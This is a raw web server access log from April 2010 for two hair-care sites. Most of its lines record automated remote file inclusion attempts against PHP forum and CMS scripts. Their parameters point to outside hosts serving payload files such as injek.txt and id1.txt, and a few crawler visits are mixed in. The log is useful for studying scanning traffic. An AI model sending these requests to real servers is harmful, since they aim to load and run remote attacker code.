207.58.170.67 - - [06/Apr/2010:10:46:06 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://stul.netsolutions.cz/img/.injek/injek.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
207.58.170.67 - - [06/Apr/2010:10:54:35 -0700] "GET /logs/access.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://stul.netsolutions.cz/img/.injek/injek.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
207.58.170.67 - - [06/Apr/2010:10:54:35 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://stul.netsolutions.cz/img/.injek/injek.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
207.58.170.67 - - [06/Apr/2010:10:54:35 -0700] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://stul.netsolutions.cz/img/.injek/injek.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:54:57 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:54:57 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:54:57 -0700] "GET /skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:54:59 -0700] "GET /skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.9.14.88 - - [06/Apr/2010:10:54:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.9.14.88 - - [06/Apr/2010:10:54:59 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.9.14.88 - - [06/Apr/2010:10:55:03 -0700] "GET /skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:55:03 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:55:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:55:06 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.9.14.88 - - [06/Apr/2010:10:55:06 -0700] "GET /skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.9.14.88 - - [06/Apr/2010:10:55:06 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.9.14.88 - - [06/Apr/2010:10:56:25 -0700] "GET /skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:56:25 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:56:25 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:56:26 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:56:26 -0700] "GET /skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:56:26 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.224.130.153 - - [06/Apr/2010:10:56:40 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.224.130.153 - - [06/Apr/2010:10:56:40 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 4807 "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.224.130.153 - - [06/Apr/2010:10:56:40 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 928 "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.9.14.88 - - [06/Apr/2010:10:56:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:56:45 -0700] "GET /skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:56:45 -0700] "GET /logs/access_100111.log//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:56:46 -0700] "GET /logs/access_100111.log//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:56:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:56:46 -0700] "GET /skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.58.170.67 - - [06/Apr/2010:10:56:59 -0700] "GET /logs/access.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://stul.netsolutions.cz/img/.injek/injek.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
207.58.170.67 - - [06/Apr/2010:10:56:59 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://stul.netsolutions.cz/img/.injek/injek.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
207.58.170.67 - - [06/Apr/2010:10:56:59 -0700] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://stul.netsolutions.cz/img/.injek/injek.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
116.122.36.61 - - [06/Apr/2010:10:57:26 -0700] "GET /logs/access_100329.log////yuboard/delete_comment.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.61 - - [06/Apr/2010:10:57:26 -0700] "GET ///yuboard/delete_comment.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.61 - - [06/Apr/2010:10:57:26 -0700] "GET /logs////yuboard/delete_comment.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.61 - - [06/Apr/2010:10:57:28 -0700] "GET /logs/access_100329.log////yuboard/delete_comment.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.61 - - [06/Apr/2010:10:57:28 -0700] "GET ///yuboard/delete_comment.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.61 - - [06/Apr/2010:10:57:28 -0700] "GET /logs////yuboard/delete_comment.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.88 - - [06/Apr/2010:10:58:19 -0700] "GET /skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.9.14.88 - - [06/Apr/2010:10:58:19 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.9.14.88 - - [06/Apr/2010:10:58:19 -0700] "GET /logs/access_091130.log//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.9.14.88 - - [06/Apr/2010:10:58:21 -0700] "GET /logs/access_091130.log//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.9.14.88 - - [06/Apr/2010:10:58:21 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.9.14.88 - - [06/Apr/2010:10:58:21 -0700] "GET /skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.9.14.88 - - [06/Apr/2010:10:58:45 -0700] "GET /logs/access_091207.log//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.9.14.88 - - [06/Apr/2010:10:58:47 -0700] "GET /logs/access_091207.log//skin/zero_vote/error.php?dir=http://www.hit168.com.cn/login/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.122.36.61 - - [06/Apr/2010:11:00:17 -0700] "GET ///yuboard/delete_comment.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.61 - - [06/Apr/2010:11:00:17 -0700] "GET /logs/access_100329.log%20%20////yuboard/delete_comment.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.61 - - [06/Apr/2010:11:00:17 -0700] "GET /logs////yuboard/delete_comment.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.61 - - [06/Apr/2010:11:00:18 -0700] "GET /logs////yuboard/delete_comment.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.61 - - [06/Apr/2010:11:00:18 -0700] "GET ///yuboard/delete_comment.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.61 - - [06/Apr/2010:11:00:18 -0700] "GET /logs/access_100329.log%20%20////yuboard/delete_comment.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.97.241.67 - - [06/Apr/2010:11:03:59 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.97.241.67 - - [06/Apr/2010:11:03:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.97.241.67 - - [06/Apr/2010:11:03:59 -0700] "GET /skin/zero_vote/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.97.241.67 - - [06/Apr/2010:11:04:10 -0700] "GET /skin/zero_vote/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.97.241.67 - - [06/Apr/2010:11:04:10 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.97.241.67 - - [06/Apr/2010:11:04:10 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.224.130.153 - - [06/Apr/2010:11:06:24 -0700] "GET /logs/access_100315.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.224.130.153 - - [06/Apr/2010:11:06:24 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 928 "-" "Mozilla/5.0" "growlonghairfast.com"
211.224.130.153 - - [06/Apr/2010:11:06:24 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 4807 "-" "Mozilla/5.0" "growlonghairfast.com"
207.46.13.51 - - [06/Apr/2010:11:11:04 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.growlonghairfast.com"
207.46.13.51 - - [06/Apr/2010:11:11:50 -0700] "GET /SecretsforFasterHairGrowth3.htm HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.growlonghairfast.com"
218.97.241.67 - - [06/Apr/2010:11:14:00 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.97.241.67 - - [06/Apr/2010:11:14:00 -0700] "GET /skin/zero_vote/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.97.241.67 - - [06/Apr/2010:11:14:00 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.97.241.67 - - [06/Apr/2010:11:14:12 -0700] "GET /skin/zero_vote/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.97.241.67 - - [06/Apr/2010:11:14:13 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.97.241.67 - - [06/Apr/2010:11:14:13 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.97.241.67 - - [06/Apr/2010:11:14:16 -0700] "GET /logs/access_091130.log%20%20//skin/zero_vote/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.97.241.67 - - [06/Apr/2010:11:14:31 -0700] "GET /logs/access_091130.log%20%20//skin/zero_vote/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
109.87.177.229 - - [06/Apr/2010:11:17:35 -0700] "GET /freehairsecretsphp/index.php+ HTTP/1.0" 404 - "http://growlonghairfast.com/freehairsecretsphp/index.php+" "Opera/9.00 (Windows NT 5.1; U; en)" "growlonghairfast.com"
109.87.177.229 - - [06/Apr/2010:11:17:36 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Opera/9.00 (Windows NT 5.1; U; en)" "growlonghairfast.com"
184.73.46.65 - - [06/Apr/2010:11:22:53 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
184.73.46.65 - - [06/Apr/2010:11:22:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17595 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
184.73.46.65 - - [06/Apr/2010:11:23:02 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
184.73.46.65 - - [06/Apr/2010:11:23:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=2179 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
121.254.172.27 - - [06/Apr/2010:11:28:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.172.27 - - [06/Apr/2010:11:28:03 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.172.27 - - [06/Apr/2010:11:28:03 -0700] "GET /skin/zero_vote/error.php?dir=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.115.1.62 - - [06/Apr/2010:11:28:56 -0700] "GET /freehairsecretsphp/viewtopic.php?p=198 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
121.254.172.27 - - [06/Apr/2010:11:39:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.254.172.27 - - [06/Apr/2010:11:39:46 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.254.172.27 - - [06/Apr/2010:11:39:46 -0700] "GET /skin/zero_vote/error.php?dir=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.254.172.27 - - [06/Apr/2010:11:39:53 -0700] "GET /logs/access_091130.log%20%20//skin/zero_vote/error.php?dir=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.122.36.61 - - [06/Apr/2010:11:39:56 -0700] "GET ///zboard//include/print_category.php?setup[use_category]=1&dir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.122.36.61 - - [06/Apr/2010:11:39:56 -0700] "GET /logs/access_091130.log%20%20////zboard//include/print_category.php?setup[use_category]=1&dir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.122.36.61 - - [06/Apr/2010:11:39:56 -0700] "GET /logs////zboard//include/print_category.php?setup[use_category]=1&dir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.174.78.178 - - [06/Apr/2010:11:40:09 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://bantara.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.174.78.178 - - [06/Apr/2010:11:40:09 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://bantara.fileave.com/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.174.78.178 - - [06/Apr/2010:11:40:09 -0700] "GET /skin/zero_vote/error.php?dir=http://bantara.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.122.36.61 - - [06/Apr/2010:11:40:19 -0700] "GET /logs////zboard//include/print_category.php?setup[use_category]=1&dir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.122.36.61 - - [06/Apr/2010:11:40:19 -0700] "GET ///zboard//include/print_category.php?setup[use_category]=1&dir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.122.36.61 - - [06/Apr/2010:11:40:19 -0700] "GET /logs/access_091130.log%20%20////zboard//include/print_category.php?setup[use_category]=1&dir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.174.78.178 - - [06/Apr/2010:11:40:23 -0700] "GET /logs/access_091130.log//skin/zero_vote/error.php?dir=http://bantara.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.100.181.218 - - [06/Apr/2010:11:41:11 -0700] "GET //bbs/write_comment_update.php?board_skin_path=http://www.corretoresdeseguros.com.br/estatisticas/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.100.181.218 - - [06/Apr/2010:11:41:11 -0700] "GET /logs///bbs/write_comment_update.php?board_skin_path=http://www.corretoresdeseguros.com.br/estatisticas/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.100.181.218 - - [06/Apr/2010:11:41:11 -0700] "GET /logs/access.log%20%20///bbs/write_comment_update.php?board_skin_path=http://www.corretoresdeseguros.com.br/estatisticas/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.100.181.218 - - [06/Apr/2010:11:41:11 -0700] "GET //bbs/write_comment_update.php?board_skin_path=http://www.corretoresdeseguros.com.br/estatisticas/id1??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.100.181.218 - - [06/Apr/2010:11:41:11 -0700] "GET /logs///bbs/write_comment_update.php?board_skin_path=http://www.corretoresdeseguros.com.br/estatisticas/id1??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.100.181.218 - - [06/Apr/2010:11:41:11 -0700] "GET /logs/access.log%20%20///bbs/write_comment_update.php?board_skin_path=http://www.corretoresdeseguros.com.br/estatisticas/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.100.181.218 - - [06/Apr/2010:11:41:12 -0700] "GET //bbs/write_comment_update.php?board_skin_path=http://www.corretoresdeseguros.com.br/estatisticas/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.100.181.218 - - [06/Apr/2010:11:41:12 -0700] "GET /logs///bbs/write_comment_update.php?board_skin_path=http://www.corretoresdeseguros.com.br/estatisticas/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.100.181.218 - - [06/Apr/2010:11:41:12 -0700] "GET /logs/access.log%20%20///bbs/write_comment_update.php?board_skin_path=http://www.corretoresdeseguros.com.br/estatisticas/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.61 - - [06/Apr/2010:11:42:07 -0700] "GET /logs/access.log%20%20////zboard//include/print_category.php?setup[use_category]=1&dir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.97.241.67 - - [06/Apr/2010:11:42:08 -0700] "GET /logs//skin/zero_pic_gallery/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.97.241.67 - - [06/Apr/2010:11:42:08 -0700] "GET /skin/zero_pic_gallery/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.61 - - [06/Apr/2010:11:42:10 -0700] "GET /logs/access.log%20%20////zboard//include/print_category.php?setup[use_category]=1&dir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.97.241.67 - - [06/Apr/2010:11:42:11 -0700] "GET /logs/access_100111.log%20%20//skin/zero_pic_gallery/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.97.241.67 - - [06/Apr/2010:11:43:35 -0700] "GET /logs//skin/zero_pic_gallery/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.97.241.67 - - [06/Apr/2010:11:43:35 -0700] "GET /logs/access_100111.log%20%20//skin/zero_pic_gallery/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.97.241.67 - - [06/Apr/2010:11:43:35 -0700] "GET /skin/zero_pic_gallery/error.php?dir=http://www.samer1.net/space/chat/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
128.210.142.81 - - [06/Apr/2010:11:44:12 -0700] "GET /logs//includes/Neos_Chronos/header.php?base_folder=http://bdkorea.org/zeroboard/data/bangla_notice/zd1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
128.210.142.81 - - [06/Apr/2010:11:44:12 -0700] "GET /logs/access.log%20%20//includes/Neos_Chronos/header.php?base_folder=http://bdkorea.org/zeroboard/data/bangla_notice/zd1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
128.210.142.81 - - [06/Apr/2010:11:44:12 -0700] "GET /includes/Neos_Chronos/header.php?base_folder=http://bdkorea.org/zeroboard/data/bangla_notice/zd1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
164.115.5.63 - - [06/Apr/2010:11:44:50 -0700] "GET /logs/access.log/bbs/board.php?board_skin_path=http://www.kyosan.com.tw/appserv/id1????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
164.115.5.63 - - [06/Apr/2010:11:44:50 -0700] "GET /bbs/board.php?board_skin_path=http://www.kyosan.com.tw/appserv/id1????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
164.115.5.63 - - [06/Apr/2010:11:44:50 -0700] "GET /logs/bbs/board.php?board_skin_path=http://www.kyosan.com.tw/appserv/id1????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.115.111.245 - - [06/Apr/2010:11:45:24 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [06/Apr/2010:11:45:24 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (co